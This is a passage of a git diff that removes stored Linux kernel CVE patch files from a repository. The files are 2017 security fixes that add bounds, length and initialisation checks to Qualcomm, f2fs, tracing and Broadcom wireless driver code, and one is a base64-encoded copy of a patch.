-+		if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) {
-+			pr_err("Invalid sha_ctxt.diglen %d\n",
-+					handle->sha_ctxt.diglen);
-+			mutex_unlock(&hash_access_lock);
-+			return -EINVAL;
-+		}
- 		qcedev_areq.sha_op_req.diglen =	handle->sha_ctxt.diglen;
- 		memcpy(&qcedev_areq.sha_op_req.digest[0],
- 				&handle->sha_ctxt.digest[0],
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0748/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0748/ANY/0001.patch
deleted file mode 100644
index 0bb69f99..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0748/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 43ff88a8336310e665941dea6ffec77cc8314706 Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Fri, 14 Apr 2017 10:28:42 +0800
-Subject: [PATCH] ASoC: msm: qdspv2: add result check when audio process fail
-
-A audio_process_event_req is not always to success. Therefore,
-check the return value for audio_process_event_req, and
-initializ usr_evt before using it.
-
-CRs-Fixed: 2029798
-Bug: 35764875
-Change-Id: I4adf682575f5f9233a1a1a533f9c6361af8a5bcf
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index ea1cb510a97fa..59f40806ee2be 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -842,6 +842,7 @@ static long audio_aio_process_event_req_compat(struct q6audio_aio *audio,
- 	long rc;
- 	struct msm_audio_event32 usr_evt_32;
- 	struct msm_audio_event usr_evt;
-+	memset(&usr_evt, 0, sizeof(struct msm_audio_event));
- 
- 	if (copy_from_user(&usr_evt_32, arg,
- 				sizeof(struct msm_audio_event32))) {
-@@ -851,6 +852,11 @@ static long audio_aio_process_event_req_compat(struct q6audio_aio *audio,
- 	usr_evt.timeout_ms = usr_evt_32.timeout_ms;
- 
- 	rc = audio_aio_process_event_req_common(audio, &usr_evt);
-+	if (rc < 0) {
-+		pr_err("%s: audio process event failed, rc = %ld",
-+			__func__, rc);
-+		return rc;
-+	}
- 
- 	usr_evt_32.event_type = usr_evt.event_type;
- 	switch (usr_evt_32.event_type) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch
deleted file mode 100644
index 3d72e02b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch
+++ /dev/null
@@ -1,217 +0,0 @@
-diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
-index 31c47d0..cbeae57 100644
---- a/kernel/trace/trace.c
-+++ b/kernel/trace/trace.c
-@@ -1282,11 +1282,11 @@
- 
- #define SAVED_CMDLINES_DEFAULT 128
- #define NO_CMDLINE_MAP UINT_MAX
--static unsigned saved_tgids[SAVED_CMDLINES_DEFAULT];
- static arch_spinlock_t trace_cmdline_lock = __ARCH_SPIN_LOCK_UNLOCKED;
- struct saved_cmdlines_buffer {
- 	unsigned map_pid_to_cmdline[PID_MAX_DEFAULT+1];
- 	unsigned *map_cmdline_to_pid;
-+	unsigned *map_cmdline_to_tgid;
- 	unsigned cmdline_num;
- 	int cmdline_idx;
- 	char *saved_cmdlines;
-@@ -1320,12 +1320,23 @@
- 		return -ENOMEM;
- 	}
- 
-+	s->map_cmdline_to_tgid = kmalloc_array(val,
-+					       sizeof(*s->map_cmdline_to_tgid),
-+					       GFP_KERNEL);
-+	if (!s->map_cmdline_to_tgid) {
-+		kfree(s->map_cmdline_to_pid);
-+		kfree(s->saved_cmdlines);
-+		return -ENOMEM;
-+	}
-+
- 	s->cmdline_idx = 0;
- 	s->cmdline_num = val;
- 	memset(&s->map_pid_to_cmdline, NO_CMDLINE_MAP,
- 	       sizeof(s->map_pid_to_cmdline));
- 	memset(s->map_cmdline_to_pid, NO_CMDLINE_MAP,
- 	       val * sizeof(*s->map_cmdline_to_pid));
-+	memset(s->map_cmdline_to_tgid, NO_CMDLINE_MAP,
-+	       val * sizeof(*s->map_cmdline_to_tgid));
- 
- 	return 0;
- }
-@@ -1491,14 +1502,17 @@
- 	if (!tsk->pid || unlikely(tsk->pid > PID_MAX_DEFAULT))
- 		return 0;
- 
-+	preempt_disable();
- 	/*
- 	 * It's not the end of the world if we don't get
- 	 * the lock, but we also don't want to spin
- 	 * nor do we want to disable interrupts,
- 	 * so if we miss here, then better luck next time.
- 	 */
--	if (!arch_spin_trylock(&trace_cmdline_lock))
-+	if (!arch_spin_trylock(&trace_cmdline_lock)) {
-+		preempt_enable();
- 		return 0;
-+	}
- 
- 	idx = savedcmd->map_pid_to_cmdline[tsk->pid];
- 	if (idx == NO_CMDLINE_MAP) {
-@@ -1521,8 +1535,9 @@
- 	}
- 
- 	set_cmdline(idx, tsk->comm);
--	saved_tgids[idx] = tsk->tgid;
-+	savedcmd->map_cmdline_to_tgid[idx] = tsk->tgid;
- 	arch_spin_unlock(&trace_cmdline_lock);
-+	preempt_enable();
- 
- 	return 1;
- }
-@@ -1564,19 +1579,29 @@
- 	preempt_enable();
- }
- 
--int trace_find_tgid(int pid)
-+static int __find_tgid_locked(int pid)
- {
- 	unsigned map;
- 	int tgid;
- 
--	preempt_disable();
--	arch_spin_lock(&trace_cmdline_lock);
- 	map = savedcmd->map_pid_to_cmdline[pid];
- 	if (map != NO_CMDLINE_MAP)
--		tgid = saved_tgids[map];
-+		tgid = savedcmd->map_cmdline_to_tgid[map];
- 	else
- 		tgid = -1;
- 
-+	return tgid;
-+}
-+
-+int trace_find_tgid(int pid)
-+{
-+	int tgid;
-+
-+	preempt_disable();
-+	arch_spin_lock(&trace_cmdline_lock);
-+
-+	tgid = __find_tgid_locked(pid);
-+
- 	arch_spin_unlock(&trace_cmdline_lock);
- 	preempt_enable();
- 
-@@ -3877,10 +3902,15 @@
- {
- 	char buf[64];
- 	int r;
-+	unsigned int n;
- 
-+	preempt_disable();
- 	arch_spin_lock(&trace_cmdline_lock);
--	r = scnprintf(buf, sizeof(buf), "%u\n", savedcmd->cmdline_num);
-+	n = savedcmd->cmdline_num;
- 	arch_spin_unlock(&trace_cmdline_lock);
-+	preempt_enable();
-+
-+	r = scnprintf(buf, sizeof(buf), "%u\n", n);
- 
- 	return simple_read_from_buffer(ubuf, cnt, ppos, buf, r);
- }
-@@ -3889,6 +3919,7 @@
- {
- 	kfree(s->saved_cmdlines);
- 	kfree(s->map_cmdline_to_pid);
-+	kfree(s->map_cmdline_to_tgid);
- 	kfree(s);
- }
- 
-@@ -3905,10 +3936,12 @@
- 		return -ENOMEM;
- 	}
- 
-+	preempt_disable();
- 	arch_spin_lock(&trace_cmdline_lock);
- 	savedcmd_temp = savedcmd;
- 	savedcmd = s;
- 	arch_spin_unlock(&trace_cmdline_lock);
-+	preempt_enable();
- 	free_saved_cmdlines_buffer(savedcmd_temp);
- 
- 	return 0;
-@@ -3951,33 +3984,61 @@
- 	char *file_buf;
- 	char *buf;
- 	int len = 0;
--	int pid;
- 	int i;
-+	int *pids;
-+	int n = 0;
- 
--	file_buf = kmalloc(SAVED_CMDLINES_DEFAULT*(16+1+16), GFP_KERNEL);
--	if (!file_buf)
-+	preempt_disable();
-+	arch_spin_lock(&trace_cmdline_lock);
-+
-+	pids = kmalloc_array(savedcmd->cmdline_num, 2*sizeof(int), GFP_KERNEL);
-+	if (!pids) {
-+		arch_spin_unlock(&trace_cmdline_lock);
-+		preempt_enable();
- 		return -ENOMEM;
-+	}
- 
--	buf = file_buf;
--
--	for (i = 0; i < SAVED_CMDLINES_DEFAULT; i++) {
--		int tgid;
--		int r;
-+	for (i = 0; i < savedcmd->cmdline_num; i++) {
-+		int pid;
- 
- 		pid = savedcmd->map_cmdline_to_pid[i];
- 		if (pid == -1 || pid == NO_CMDLINE_MAP)
- 			continue;
- 
--		tgid = trace_find_tgid(pid);
--		r = sprintf(buf, "%d %d\n", pid, tgid);
-+		pids[n] = pid;
-+		pids[n+1] = __find_tgid_locked(pid);
-+		n += 2;
-+	}
-+	arch_spin_unlock(&trace_cmdline_lock);
-+	preempt_enable();
-+
-+	if (n == 0) {
-+		kfree(pids);
-+		return 0;
-+	}
-+
-+	/* enough to hold max pair of pids + space, lr and nul */
-+	len = n * 12;
-+	file_buf = kmalloc(len, GFP_KERNEL);
-+	if (!file_buf) {
-+		kfree(pids);
-+		return -ENOMEM;
-+	}
-+
-+	buf = file_buf;
-+	for (i = 0; i < n && len > 0; i += 2) {
-+		int r;
-+
-+		r = snprintf(buf, len, "%d %d\n", pids[i], pids[i+1]);
- 		buf += r;
--		len += r;
-+		len -= r;
- 	}
- 
- 	len = simple_read_from_buffer(ubuf, cnt, ppos,
--				      file_buf, len);
-+				      file_buf, buf - file_buf);
- 
- 	kfree(file_buf);
-+	kfree(pids);
- 
- 	return len;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch.base64
deleted file mode 100644
index 42806cb7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2tlcm5lbC90cmFjZS90cmFjZS5jIGIva2VybmVsL3RyYWNlL3RyYWNlLmMKaW5kZXggMzFjNDdkMC4uY2JlYWU1NyAxMDA2NDQKLS0tIGEva2VybmVsL3RyYWNlL3RyYWNlLmMKKysrIGIva2VybmVsL3RyYWNlL3RyYWNlLmMKQEAgLTEyODIsMTEgKzEyODIsMTEgQEAKIAogI2RlZmluZSBTQVZFRF9DTURMSU5FU19ERUZBVUxUIDEyOAogI2RlZmluZSBOT19DTURMSU5FX01BUCBVSU5UX01BWAotc3RhdGljIHVuc2lnbmVkIHNhdmVkX3RnaWRzW1NBVkVEX0NNRExJTkVTX0RFRkFVTFRdOwogc3RhdGljIGFyY2hfc3BpbmxvY2tfdCB0cmFjZV9jbWRsaW5lX2xvY2sgPSBfX0FSQ0hfU1BJTl9MT0NLX1VOTE9DS0VEOwogc3RydWN0IHNhdmVkX2NtZGxpbmVzX2J1ZmZlciB7CiAJdW5zaWduZWQgbWFwX3BpZF90b19jbWRsaW5lW1BJRF9NQVhfREVGQVVMVCsxXTsKIAl1bnNpZ25lZCAqbWFwX2NtZGxpbmVfdG9fcGlkOworCXVuc2lnbmVkICptYXBfY21kbGluZV90b190Z2lkOwogCXVuc2lnbmVkIGNtZGxpbmVfbnVtOwogCWludCBjbWRsaW5lX2lkeDsKIAljaGFyICpzYXZlZF9jbWRsaW5lczsKQEAgLTEzMjAsMTIgKzEzMjAsMjMgQEAKIAkJcmV0dXJuIC1FTk9NRU07CiAJfQogCisJcy0+bWFwX2NtZGxpbmVfdG9fdGdpZCA9IGttYWxsb2NfYXJyYXkodmFsLAorCQkJCQkgICAgICAgc2l6ZW9mKCpzLT5tYXBfY21kbGluZV90b190Z2lkKSwKKwkJCQkJICAgICAgIEdGUF9LRVJORUwpOworCWlmICghcy0+bWFwX2NtZGxpbmVfdG9fdGdpZCkgeworCQlrZnJlZShzLT5tYXBfY21kbGluZV90b19waWQpOworCQlrZnJlZShzLT5zYXZlZF9jbWRsaW5lcyk7CisJCXJldHVybiAtRU5PTUVNOworCX0KKwogCXMtPmNtZGxpbmVfaWR4ID0gMDsKIAlzLT5jbWRsaW5lX251bSA9IHZhbDsKIAltZW1zZXQoJnMtPm1hcF9waWRfdG9fY21kbGluZSwgTk9fQ01ETElORV9NQVAsCiAJICAgICAgIHNpemVvZihzLT5tYXBfcGlkX3RvX2NtZGxpbmUpKTsKIAltZW1zZXQocy0+bWFwX2NtZGxpbmVfdG9fcGlkLCBOT19DTURMSU5FX01BUCwKIAkgICAgICAgdmFsICogc2l6ZW9mKCpzLT5tYXBfY21kbGluZV90b19waWQpKTsKKwltZW1zZXQocy0+bWFwX2NtZGxpbmVfdG9fdGdpZCwgTk9fQ01ETElORV9NQVAsCisJICAgICAgIHZhbCAqIHNpemVvZigqcy0+bWFwX2NtZGxpbmVfdG9fdGdpZCkpOwogCiAJcmV0dXJuIDA7CiB9CkBAIC0xNDkxLDE0ICsxNTAyLDE3IEBACiAJaWYgKCF0c2stPnBpZCB8fCB1bmxpa2VseSh0c2stPnBpZCA+IFBJRF9NQVhfREVGQVVMVCkpCiAJCXJldHVybiAwOwogCisJcHJlZW1wdF9kaXNhYmxlKCk7CiAJLyoKIAkgKiBJdCdzIG5vdCB0aGUgZW5kIG9mIHRoZSB3b3JsZCBpZiB3ZSBkb24ndCBnZXQKIAkgKiB0aGUgbG9jaywgYnV0IHdlIGFsc28gZG9uJ3Qgd2FudCB0byBzcGluCiAJICogbm9yIGRvIHdlIHdhbnQgdG8gZGlzYWJsZSBpbnRlcnJ1cHRzLAogCSAqIHNvIGlmIHdlIG1pc3MgaGVyZSwgdGhlbiBiZXR0ZXIgbHVjayBuZXh0IHRpbWUuCiAJICovCi0JaWYgKCFhcmNoX3NwaW5fdHJ5bG9jaygmdHJhY2VfY21kbGluZV9sb2NrKSkKKwlpZiAoIWFyY2hfc3Bpbl90cnlsb2NrKCZ0cmFjZV9jbWRsaW5lX2xvY2spKSB7CisJCXByZWVtcHRfZW5hYmxlKCk7CiAJCXJldHVybiAwOworCX0KIAogCWlkeCA9IHNhdmVkY21kLT5tYXBfcGlkX3RvX2NtZGxpbmVbdHNrLT5waWRdOwogCWlmIChpZHggPT0gTk9fQ01ETElORV9NQVApIHsKQEAgLTE1MjEsOCArMTUzNSw5IEBACiAJfQogCiAJc2V0X2NtZGxpbmUoaWR4LCB0c2stPmNvbW0pOwotCXNhdmVkX3RnaWRzW2lkeF0gPSB0c2stPnRnaWQ7CisJc2F2ZWRjbWQtPm1hcF9jbWRsaW5lX3RvX3RnaWRbaWR4XSA9IHRzay0+dGdpZDsKIAlhcmNoX3NwaW5fdW5sb2NrKCZ0cmFjZV9jbWRsaW5lX2xvY2spOworCXByZWVtcHRfZW5hYmxlKCk7CiAKIAlyZXR1cm4gMTsKIH0KQEAgLTE1NjQsMTkgKzE1NzksMjkgQEAKIAlwcmVlbXB0X2VuYWJsZSgpOwogfQogCi1pbnQgdHJhY2VfZmluZF90Z2lkKGludCBwaWQpCitzdGF0aWMgaW50IF9fZmluZF90Z2lkX2xvY2tlZChpbnQgcGlkKQogewogCXVuc2lnbmVkIG1hcDsKIAlpbnQgdGdpZDsKIAotCXByZWVtcHRfZGlzYWJsZSgpOwotCWFyY2hfc3Bpbl9sb2NrKCZ0cmFjZV9jbWRsaW5lX2xvY2spOwogCW1hcCA9IHNhdmVkY21kLT5tYXBfcGlkX3RvX2NtZGxpbmVbcGlkXTsKIAlpZiAobWFwICE9IE5PX0NNRExJTkVfTUFQKQotCQl0Z2lkID0gc2F2ZWRfdGdpZHNbbWFwXTsKKwkJdGdpZCA9IHNhdmVkY21kLT5tYXBfY21kbGluZV90b190Z2lkW21hcF07CiAJZWxzZQogCQl0Z2lkID0gLTE7CiAKKwlyZXR1cm4gdGdpZDsKK30KKworaW50IHRyYWNlX2ZpbmRfdGdpZChpbnQgcGlkKQoreworCWludCB0Z2lkOworCisJcHJlZW1wdF9kaXNhYmxlKCk7CisJYXJjaF9zcGluX2xvY2soJnRyYWNlX2NtZGxpbmVfbG9jayk7CisKKwl0Z2lkID0gX19maW5kX3RnaWRfbG9ja2VkKHBpZCk7CisKIAlhcmNoX3NwaW5fdW5sb2NrKCZ0cmFjZV9jbWRsaW5lX2xvY2spOwogCXByZWVtcHRfZW5hYmxlKCk7CiAKQEAgLTM4NzcsMTAgKzM5MDIsMTUgQEAKIHsKIAljaGFyIGJ1Zls2NF07CiAJaW50IHI7CisJdW5zaWduZWQgaW50IG47CiAKKwlwcmVlbXB0X2Rpc2FibGUoKTsKIAlhcmNoX3NwaW5fbG9jaygmdHJhY2VfY21kbGluZV9sb2NrKTsKLQlyID0gc2NucHJpbnRmKGJ1Ziwgc2l6ZW9mKGJ1ZiksICIldVxuIiwgc2F2ZWRjbWQtPmNtZGxpbmVfbnVtKTsKKwluID0gc2F2ZWRjbWQtPmNtZGxpbmVfbnVtOwogCWFyY2hfc3Bpbl91bmxvY2soJnRyYWNlX2NtZGxpbmVfbG9jayk7CisJcHJlZW1wdF9lbmFibGUoKTsKKworCXIgPSBzY25wcmludGYoYnVmLCBzaXplb2YoYnVmKSwgIiV1XG4iLCBuKTsKIAogCXJldHVybiBzaW1wbGVfcmVhZF9mcm9tX2J1ZmZlcih1YnVmLCBjbnQsIHBwb3MsIGJ1Ziwgcik7CiB9CkBAIC0zODg5LDYgKzM5MTksNyBAQAogewogCWtmcmVlKHMtPnNhdmVkX2NtZGxpbmVzKTsKIAlrZnJlZShzLT5tYXBfY21kbGluZV90b19waWQpOworCWtmcmVlKHMtPm1hcF9jbWRsaW5lX3RvX3RnaWQpOwogCWtmcmVlKHMpOwogfQogCkBAIC0zOTA1LDEwICszOTM2LDEyIEBACiAJCXJldHVybiAtRU5PTUVNOwogCX0KIAorCXByZWVtcHRfZGlzYWJsZSgpOwogCWFyY2hfc3Bpbl9sb2NrKCZ0cmFjZV9jbWRsaW5lX2xvY2spOwogCXNhdmVkY21kX3RlbXAgPSBzYXZlZGNtZDsKIAlzYXZlZGNtZCA9IHM7CiAJYXJjaF9zcGluX3VubG9jaygmdHJhY2VfY21kbGluZV9sb2NrKTsKKwlwcmVlbXB0X2VuYWJsZSgpOwogCWZyZWVfc2F2ZWRfY21kbGluZXNfYnVmZmVyKHNhdmVkY21kX3RlbXApOwogCiAJcmV0dXJuIDA7CkBAIC0zOTUxLDMzICszOTg0LDYxIEBACiAJY2hhciAqZmlsZV9idWY7CiAJY2hhciAqYnVmOwogCWludCBsZW4gPSAwOwotCWludCBwaWQ7CiAJaW50IGk7CisJaW50ICpwaWRzOworCWludCBuID0gMDsKIAotCWZpbGVfYnVmID0ga21hbGxvYyhTQVZFRF9DTURMSU5FU19ERUZBVUxUKigxNisxKzE2KSwgR0ZQX0tFUk5FTCk7Ci0JaWYgKCFmaWxlX2J1ZikKKwlwcmVlbXB0X2Rpc2FibGUoKTsKKwlhcmNoX3NwaW5fbG9jaygmdHJhY2VfY21kbGluZV9sb2NrKTsKKworCXBpZHMgPSBrbWFsbG9jX2FycmF5KHNhdmVkY21kLT5jbWRsaW5lX251bSwgMipzaXplb2YoaW50KSwgR0ZQX0tFUk5FTCk7CisJaWYgKCFwaWRzKSB7CisJCWFyY2hfc3Bpbl91bmxvY2soJnRyYWNlX2NtZGxpbmVfbG9jayk7CisJCXByZWVtcHRfZW5hYmxlKCk7CiAJCXJldHVybiAtRU5PTUVNOworCX0KIAotCWJ1ZiA9IGZpbGVfYnVmOwotCi0JZm9yIChpID0gMDsgaSA8IFNBVkVEX0NNRExJTkVTX0RFRkFVTFQ7IGkrKykgewotCQlpbnQgdGdpZDsKLQkJaW50IHI7CisJZm9yIChpID0gMDsgaSA8IHNhdmVkY21kLT5jbWRsaW5lX251bTsgaSsrKSB7CisJCWludCBwaWQ7CiAKIAkJcGlkID0gc2F2ZWRjbWQtPm1hcF9jbWRsaW5lX3RvX3BpZFtpXTsKIAkJaWYgKHBpZCA9PSAtMSB8fCBwaWQgPT0gTk9fQ01ETElORV9NQVApCiAJCQljb250aW51ZTsKIAotCQl0Z2lkID0gdHJhY2VfZmluZF90Z2lkKHBpZCk7Ci0JCXIgPSBzcHJpbnRmKGJ1ZiwgIiVkICVkXG4iLCBwaWQsIHRnaWQpOworCQlwaWRzW25dID0gcGlkOworCQlwaWRzW24rMV0gPSBfX2ZpbmRfdGdpZF9sb2NrZWQocGlkKTsKKwkJbiArPSAyOworCX0KKwlhcmNoX3NwaW5fdW5sb2NrKCZ0cmFjZV9jbWRsaW5lX2xvY2spOworCXByZWVtcHRfZW5hYmxlKCk7CisKKwlpZiAobiA9PSAwKSB7CisJCWtmcmVlKHBpZHMpOworCQlyZXR1cm4gMDsKKwl9CisKKwkvKiBlbm91Z2ggdG8gaG9sZCBtYXggcGFpciBvZiBwaWRzICsgc3BhY2UsIGxyIGFuZCBudWwgKi8KKwlsZW4gPSBuICogMTI7CisJZmlsZV9idWYgPSBrbWFsbG9jKGxlbiwgR0ZQX0tFUk5FTCk7CisJaWYgKCFmaWxlX2J1ZikgeworCQlrZnJlZShwaWRzKTsKKwkJcmV0dXJuIC1FTk9NRU07CisJfQorCisJYnVmID0gZmlsZV9idWY7CisJZm9yIChpID0gMDsgaSA8IG4gJiYgbGVuID4gMDsgaSArPSAyKSB7CisJCWludCByOworCisJCXIgPSBzbnByaW50ZihidWYsIGxlbiwgIiVkICVkXG4iLCBwaWRzW2ldLCBwaWRzW2krMV0pOwogCQlidWYgKz0gcjsKLQkJbGVuICs9IHI7CisJCWxlbiAtPSByOwogCX0KIAogCWxlbiA9IHNpbXBsZV9yZWFkX2Zyb21fYnVmZmVyKHVidWYsIGNudCwgcHBvcywKLQkJCQkgICAgICBmaWxlX2J1ZiwgbGVuKTsKKwkJCQkgICAgICBmaWxlX2J1ZiwgYnVmIC0gZmlsZV9idWYpOwogCiAJa2ZyZWUoZmlsZV9idWYpOworCWtmcmVlKHBpZHMpOwogCiAJcmV0dXJuIGxlbjsKIH0K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0750/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0750/ANY/0001.patch
deleted file mode 100644
index 68f42d9f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0750/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 3f0531e5775303091a1ff975cdd572cc6a935321 Mon Sep 17 00:00:00 2001
-From: Jin Qian <jinqian@google.com>
-Date: Mon, 24 Apr 2017 18:20:52 -0700
-Subject: [PATCH] BACKPORT: f2fs: sanity check log_blocks_per_seg
-
-f2fs currently only supports 4KB block size and 2MB segment size.
-Sanity check log_blocks_per_seg == 9, i.e. 2MB/4KB = (1 << 9)
-
-Partially
-(cherry-picked from commit 9a59b62fd88196844cee5fff851bee2cfd7afb6e)
-
-f2fs: do more integrity verification for superblock
-
-Do more sanity check for superblock during ->mount.
-
-Signed-off-by: Chao Yu <chao2.yu@samsung.com>
-Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
-
-Bug: 36817013
-Change-Id: I0be52e54fba82083068337ceb9f7ad985a87319f
-Signed-off-by: Jin Qian <jinqian@google.com>
----
- fs/f2fs/super.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
-index 3a65e01323528..98a77b0a365d9 100644
---- a/fs/f2fs/super.c
-+++ b/fs/f2fs/super.c
-@@ -947,6 +947,14 @@ static int sanity_check_raw_super(struct super_block *sb,
- 		return 1;
- 	}
- 
-+	/* check log blocks per segment */
-+	if (le32_to_cpu(raw_super->log_blocks_per_seg) != 9) {
-+		f2fs_msg(sb, KERN_INFO,
-+			"Invalid log blocks per segment (%u)\n",
-+			le32_to_cpu(raw_super->log_blocks_per_seg));
-+		return 1;
-+	}
-+
- 	/* Currently, support 512/1024/2048/4096 bytes sector size */
- 	if (le32_to_cpu(raw_super->log_sectorsize) >
- 				F2FS_MAX_LOG_SECTOR_SIZE ||
diff --git a/Patches/Linux_CVEs/CVE-2017-0751/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0751/ANY/0001.patch
deleted file mode 100644
index 1bc956f1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0751/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From ee4aa31b9f24c28064e509e22c1f9013df768f5f Mon Sep 17 00:00:00 2001
-From: Dennis Cagle <d-cagle@codeaurora.org>
-Date: Wed, 31 May 2017 16:28:01 -0700
-Subject: [PATCH] qcdev: Check the digest length during the SHA operations
-
-Check the digest length to avoid buffer overflow while
-doing the SHA operations.
-
-Bug: 36591162
-CRs-Fixed: 2045061
-Change-Id: I4d3fb20723f59e905a672edaf84ee5d0865905b1
-Signed-off-by: Brahmaji K <bkomma@codeaurora.org>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- drivers/crypto/msm/qcedev.c | 12 ++++++++++++
- 1 file changed, 12 insertions(+)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index ef4b5e15b4fad..f42d19a5cf59e 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1709,6 +1709,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		err = qcedev_hash_final(&qcedev_areq, handle);
- 		if (err)
- 			return err;
-+
-+		if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) {
-+			pr_err("Invalid sha_ctxt.diglen %d\n",
-+					handle->sha_ctxt.diglen);
-+			return -EINVAL;
-+		}
- 		qcedev_areq.sha_op_req.diglen = handle->sha_ctxt.diglen;
- 		memcpy(&qcedev_areq.sha_op_req.digest[0],
- 				&handle->sha_ctxt.digest[0],
-@@ -1737,6 +1743,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		err = qcedev_hash_final(&qcedev_areq, handle);
- 		if (err)
- 			return err;
-+
-+		if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) {
-+			pr_err("Invalid sha_ctxt.diglen %d\n",
-+					handle->sha_ctxt.diglen);
-+			return -EINVAL;
-+		}
- 		qcedev_areq.sha_op_req.diglen =	handle->sha_ctxt.diglen;
- 		memcpy(&qcedev_areq.sha_op_req.digest[0],
- 				&handle->sha_ctxt.digest[0],
diff --git a/Patches/Linux_CVEs/CVE-2017-0786/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0786/ANY/0001.patch
deleted file mode 100644
index 6051a676..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0786/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 68acc6ab1474e9dde68880a7856e8a74ff86aa19 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Mon, 5 Jun 2017 10:21:10 -0700
-Subject: net: wireless: bcmdhd: adding boudary check in wl_escan_handler
-
-WLC_E_ESCAN_RESULT event could be manipulated especially two length field
-inside, one is for escan_result buffer length and another one is
-bss_info length, the forged fields may bypass current length check and
-corrupt kernel heap memory.
-
-so added checking validation for two length fields in WLC_E_ESCAN_RESULT
-event.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 37351060
-Change-Id: I31e9fccc48fc06278fb3a87a76ef7337296c2b0d
----
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 021f69f7..d8c748d 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -10513,6 +10513,13 @@ static s32 wl_escan_handler(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 			WL_ERR(("Invalid escan result (NULL pointer)\n"));
- 			goto exit;
- 		}
-+		if ((dtoh32(escan_result->buflen) > ESCAN_BUF_SIZE) ||
-+		    (dtoh32(escan_result->buflen) <
-+			sizeof(wl_escan_result_t))) {
-+			WL_ERR(("Invalid escan buffer len:%d\n",
-+				dtoh32(escan_result->buflen)));
-+			goto exit;
-+		}
- 		if (dtoh16(escan_result->bss_count) != 1) {
- 			WL_ERR(("Invalid bss_count %d: ignoring\n", escan_result->bss_count));
- 			goto exit;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0787/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0787/ANY/0001.patch
deleted file mode 100644
index 8acfe027..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0787/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Mon, 5 Jun 2017 14:39:26 -0700
-Subject: net: wireless: bcmdhd: adding boundary check for pfn events
-
-adding boundary check for bssid count in dhd_pno_process_epno_result
-and dhd_handle_hotlist_scan_evt function to prevent heap overflow.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 37722328
-Bug: 37722970
-Change-Id: I1f0bc25ef4e7f5ba8f1aa9d9271919ee84d780a1
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 16 ++++++++++++++--
- 1 file changed, 14 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 8ebdf53..1a8e4ee 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -92,6 +92,11 @@
- #define ENTRY_OVERHEAD strlen("bssid=\nssid=\nfreq=\nlevel=\nage=\ndist=\ndistSd=\n====")
- #define TIME_MIN_DIFF 5
- 
-+#define EVENT_DATABUF_MAXLEN	(512 - sizeof(bcm_event_t))
-+#define EVENT_MAX_NETCNT \
